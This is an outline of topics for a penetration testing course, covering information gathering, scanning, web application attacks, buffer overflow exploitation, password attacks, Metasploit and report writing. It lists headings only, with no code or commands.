Introduction to penetration test:
Methodology
Objectives
Bash scripting:
Basic commands and redirections
Language structure
Variables, conditions, and loops
Passive information gathering:
- Open web information gathering
Search engines
Google dorks
Email harvesting
Netcraft
Whois enumeration
Networking tools:
Connecting to TCP/UDP ports
Listening to TCP/UDP ports
File transfer
Remote administration
Introduction to wireshark
Traffic capturing and filters
Follow TCP stream
Traffic filtering
Advanced header filtering
Active information gathering:
- DNS Enumeration
- DNS lookups
Forward lookup brute force
Reverse lookup brute force
DNS zone transfer
TCP ports scanning
UDP ports scanning
Port scanning with NMAP
Service enumeration
OS fingerprinting
Nmap scripting Engine (NSE)
SMB enumeration
SMTP enumeration
SNMP enumeration
Vulnerability scanning:
- NMAP Vulnerability scanning
- Nessus vulnerability scanning
Web application attacks:
- Introduction to Web Proxy (Burp)
- Cross site scripting (XSS)
Cross site scripting types
Browser redirection and IFRAME injection
Cookies stealing and Session information
Local file inclusion
Remote file inclusion
Authentication bypass
Enumerating the database
Column number enumeration
Data extraction
Code execution
Win32 buffer overflow exploitation:
- Introduction to debugger
- Types of buffer overflow
- Fuzzing
- Replicating the crash
- Exploiting the vulnerability
Controlling EIP
Locating space for shellcode
Checking for bad characters
Redirecting the execution flow
Generating the shellcode
Getting a shell
Linux buffer overflow exploitation:
- Introduction to GDB Generating the shellcode
- Replicating the crash
- Exploiting the vulnerability
Controlling EIP
Locating space for shellcode
Checking for bad characters
Redirecting the execution flow
Getting a shell
Working with exploits:
Finding exploits in Kali
Finding exploits on the web
- Customizing and fixing exploits
Customizing exploit
Password attacks:
Dictionary files
Key space brute force
pwdump and fg dump
Windows credential editor
Password profiling
Password mutating
Hydra, Medusa and Ncrack
Choosing the right protocol: Speed vs Reward
Password hashes
John the ripper
Rainbow tables
Passing the hash in windows
Data exfiltration:
Non interactive shell
Uploading files
Metasploit framework:
- Introduction to user interfaces
- Installation and updates
- Metasploit framework structure
Auxiliary modules
Exploit modules
Staged and non-staged payloads
Executable payloads
Meterpreter payloads
Multi handler
Meterpreter post exploitation
Post exploitation modules
Reporting:
- Vulnerabilities risk rating
CVSS and CWE concepts
CVSS calculation tools
OWASP risk rating
- Vulnerability definition and details
- Recommendations and fix priority
- Writing your report